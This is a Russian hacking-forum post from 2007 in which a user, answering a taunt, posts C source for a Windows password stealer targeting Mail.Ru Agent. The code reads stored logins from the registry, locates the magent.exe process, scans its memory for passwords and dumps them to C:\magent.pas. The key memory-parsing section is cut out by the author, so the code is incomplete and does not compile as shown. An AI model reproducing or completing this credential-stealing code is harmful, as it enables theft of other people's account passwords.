|
Новичок
Регистрация: 12.01.2007
Сообщений: 22
С нами:
10172416
Репутация:
14
|
|
PHP код:
[QUOTE=_hack_ing_]ну ты суперпуперпрограммистмегахэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)[/QUOTE]
Лови мега хацкер...
#include <windows.h>
#include <stdio.h>
#include<tlhelp32.h>
//--------------------------------------------
//--------------------------------------------
//--------------------------------------------
//--------------------------------------------
BOOL ParsingMagentDump(BYTE *, int, int);
//--------------------------------------------
//--------------------------------------------
bool fl_ = 0;
//--------------------------------------------
//--------------------------------------------
void printf_(char *msg)
{
char tmp[255];
sprintf(tmp,msg);
CharToOem(tmp,tmp);
printf("%s\n",tmp);
}
//--------------------------------------------
//--------------------------------------------
void write_file(BYTE* b, long i)
{
HANDLE hFile = CreateFile("C:\\magent.pas",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hFile != INVALID_HANDLE_VALUE)
{
DWORD ret;
if (!fl_)
{
fl_ = 1;
printf_("Файл C:\\magent.pas создан..");
}
SetFilePointer(hFile, 0, 0, FILE_END);
WriteFile(hFile,&b[0],i,&ret,NULL);
CloseHandle(hFile);
} else
printf_("Ошибка создания или открытия файла C:\\magent.pas..");
}
//--------------------------------------------
//--------------------------------------------
void start_scanmmemory()
{
HKEY key = 0;
printf_("Берем данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Mail.Ru\\Agent\\mra_logins",0,KEY_READ, &key) == ERROR_SUCCESS)
{
char svValueName[MAX_PATH];
memset(&svValueName,0,MAX_PATH);
int count=0;
DWORD cbValueNameLen = MAX_PATH;
DWORD cbValueDataLen = MAX_PATH;
DWORD dwType,pasLen;
char ttt[255];
while(RegEnumValue(key,count,svValueName,&cbValueNameLen,NULL,&dwType,NULL,&cbValueDataLen)!=ERROR_NO_MORE_ITEMS)
{
if (strlen(svValueName) > 0)
{
sprintf(ttt,"Логин : %s",svValueName);
printf_(ttt);
BYTE g[255];
BYTE login[255];
memset(&g,0,255);
memset(&login,0,255);
RegQueryValueEx(key,svValueName,NULL,&dwType,g,&pasLen);
int i = strlen(svValueName);
memcpy(login,&svValueName[0],strlen(svValueName));
memcpy(&login[i],g,4);
sprintf(ttt,"Размер пароля : %d",pasLen-4);
printf_(ttt);
i+=4;
ParsingMagentDump(login, i, pasLen);
}
memset(&svValueName,0,MAX_PATH);
cbValueNameLen = MAX_PATH;
cbValueDataLen = MAX_PATH;
count++;
}
if (count == 0)
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
RegCloseKey(key);
} else
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
}
//--------------------------------------------
//--------------------------------------------
BOOL ParsingMagentDump(BYTE * login, int ls, int ps)
{
printf_("Сканим список процессов, ищем magent.exe...");
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
HANDLE hProcess = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap == INVALID_HANDLE_VALUE) return false;
// .......................
// Посмотрели и хватит!!!!
}
offset++;
if (offset > (0x800000) || fl) break;
}
} else
printf_("Не удалось найти процесс Magent.exe в списке процессов...");
CloseHandle(hProcessSnap);
return fl;
}
//--------------------------------------------
//--------------------------------------------
int main(int argc, char* argv[])
{
start_scanmmemory();
printf_("Работа закончена!");
return 0;
}
Последний раз редактировалось Constantine; 26.01.2007 в 20:49..
Причина: ИСПОЛЬЗУЕМ ТЕГИ!!!
|